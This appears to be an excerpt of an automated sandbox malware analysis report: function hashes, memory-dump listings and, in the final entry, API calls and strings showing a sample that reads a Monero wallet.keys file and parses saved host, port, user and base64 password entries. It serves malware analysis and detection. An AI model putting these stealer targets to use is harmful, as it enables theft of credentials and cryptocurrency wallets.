                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1C'{
                                  • API String ID: 0-102590864
                                  • Opcode ID: 7e789803abdaa91f5387f69267b8ca0da99a005db6bbc84220e322baed20eab5
                                  • Instruction ID: 0853ea17fae6e3de8304f2d9e1a948e6b3bc0edcf9529fc814f8725878fc6dc5
                                  • Opcode Fuzzy Hash: 7e789803abdaa91f5387f69267b8ca0da99a005db6bbc84220e322baed20eab5
                                  • Instruction Fuzzy Hash: B7B2D4F3A0C6049FE304AF29EC8567AFBE9EF94720F16493DEAC483744E63558058697
                                  Function 00E82FE9 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: aXc$y:K
                                  • API String ID: 0-997329546
                                  • Opcode ID: 56adcba3a0559026fb7efae5596eaf99485e4db30c6af7efb1e34af9b87f7fa6
                                  • Instruction ID: cde2e4336934978c55f576f6c29599ae5de3a4cb1481d9849f2c759569516756
                                  • Opcode Fuzzy Hash: 56adcba3a0559026fb7efae5596eaf99485e4db30c6af7efb1e34af9b87f7fa6
                                  • Instruction Fuzzy Hash: BE518BF3E142045BE3006E3CED8573ABBDAEB90710F2A863DDA84C7385E939590487D6
                                  Function 00E6F46A Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Ciw{$`1{>
                                  • API String ID: 0-2717700013
                                  • Opcode ID: 0ee9fc03845b36adea4d224fb94b08f81a6999a0ee9c22598c78b0cb53232b2d
                                  • Instruction ID: 32beabf94ba40b557dfccca0aaf488fa9b5b24735c26bc961abc2cca3ff473ba
                                  • Opcode Fuzzy Hash: 0ee9fc03845b36adea4d224fb94b08f81a6999a0ee9c22598c78b0cb53232b2d
                                  • Instruction Fuzzy Hash: F941F7F310C7089FE3116E29ECD177AFBD8EB94720F16492EE6C0C7740E97999448696
                                  Function 00F7123A Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: WD|
                                  • API String ID: 0-1174168260
                                  • Opcode ID: a67881a9d9eafe66f8581bc5fa30f9aff041138b1826d44f86e896fcdc1ad326
                                  • Instruction ID: 926fa9c763e0e2ca07921732e273a1e7c9d6e1c3712851a38d2c13e965b0b887
                                  • Opcode Fuzzy Hash: a67881a9d9eafe66f8581bc5fa30f9aff041138b1826d44f86e896fcdc1ad326
                                  • Instruction Fuzzy Hash: 60D137F3A08204AFE3046E2DDC8567ABBE9EF94720F1A853DEAC4C3344E93559158797
                                  Function 00E21D60 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ]uk
                                  • API String ID: 0-4227159379
                                  • Opcode ID: e85c00e9875f8f1d2d9f198a024dbc39f9488ddea2ba9f040fd021a7e3a2f233
                                  • Instruction ID: 15d2fb2adf2d7386386db49a74f21e5df5609db8bb86b4b79b93dba3592de690
                                  • Opcode Fuzzy Hash: e85c00e9875f8f1d2d9f198a024dbc39f9488ddea2ba9f040fd021a7e3a2f233
                                  • Instruction Fuzzy Hash: 3F7127F3B082109FF304AE2DEC9577AB6D6DBD4310F2B853DD68487784ED7898068286
                                  Function 00E4104B Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <1l_
                                  • API String ID: 0-2358017900
                                  • Opcode ID: a7169c155a811faa412d28ce4bfa7e891a28ac0bebe2dac832667d1b9b474fa8
                                  • Instruction ID: 2674bec347df89cbd5acc03cfb8b457e144cf83f8be1d295e5c65b81af689bff
                                  • Opcode Fuzzy Hash: a7169c155a811faa412d28ce4bfa7e891a28ac0bebe2dac832667d1b9b474fa8
                                  • Instruction Fuzzy Hash: DA614BF3E186149BE3046E39EC897A77BD6EB94320F1A463DEAC4D77C4E53988418385
                                  Function 00EBA62E Relevance: .2, Instructions: 177COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be4138c63b30bc192a10e71edd6dd817e61d907fd9479d8f7f416e3e23cc78c6
                                  • Instruction ID: 475c3810aac17fdf9b159a3b8b93ef345df47c33b2233c1944679262e330d335
                                  • Opcode Fuzzy Hash: be4138c63b30bc192a10e71edd6dd817e61d907fd9479d8f7f416e3e23cc78c6
                                  • Instruction Fuzzy Hash: 7051D4B39082109FE314AF2DDC8576AFBE5EF94720F16893DDAC8C7340E63958548796
                                  Function 00EF5410 Relevance: .1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5d791a2c18975dd64afc06f09ea3ef5991b293c238fa32510ebbdf774e5b073f
                                  • Instruction ID: 59d92e526f9c102bf012e9258e17424df2a81363c4e320902d190425b372681d
                                  • Opcode Fuzzy Hash: 5d791a2c18975dd64afc06f09ea3ef5991b293c238fa32510ebbdf774e5b073f
                                  • Instruction Fuzzy Hash: B6318DF390C2045BE304AD7DEC84727F7DAEBD4320F2A853DE585C7784E979A9058196
                                  Function 0101099F Relevance: .1, Instructions: 112COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b3c1e542bf38f7a4e53bee15f0734f3164c7d05909458c1f88aa160fd52c782
                                  • Instruction ID: 119beb076d44aba6b3f3233d3c82b049a9fd317ab92189d69ea95d2ff4cb841d
                                  • Opcode Fuzzy Hash: 6b3c1e542bf38f7a4e53bee15f0734f3164c7d05909458c1f88aa160fd52c782
                                  • Instruction Fuzzy Hash: FD31E2B250D704DBE309AE2AD85063EF7E6FF94710F56882DE5C24765CEA384881CB87
                                  Function 010334AB Relevance: .1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0219d18d9555d0f09da4426a590f14220a164f5da5157b4cc252352a61702a6
                                  • Instruction ID: 010b628717921a7ae4629a69b2d69c72758409c063fe3909e7d6a1469baa3ed3
                                  • Opcode Fuzzy Hash: d0219d18d9555d0f09da4426a590f14220a164f5da5157b4cc252352a61702a6
                                  • Instruction Fuzzy Hash: 3B3106B100C7049FE7097F28D8966BAFBE4FF18310F56092DE6C686250EA755890DB9B
                                  Function 00BB9750 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Function 00BB0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8E0B
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA99EC
                                    • Part of subcall function 00BA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BA9A11
                                    • Part of subcall function 00BA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BA9A31
                                    • Part of subcall function 00BA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BA9A5A
                                    • Part of subcall function 00BA99C0: LocalFree.KERNEL32(00BA148F), ref: 00BA9A90
                                    • Part of subcall function 00BA99C0: CloseHandle.KERNEL32(000000FF), ref: 00BA9A9A
                                    • Part of subcall function 00BB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00BC0DBA,00BC0DB7,00BC0DB6,00BC0DB3), ref: 00BB0362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB0369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00BB0385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB0393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00BB03CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB03DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00BB0419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB0427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00BB0463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB0475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB0502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB0532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB054A
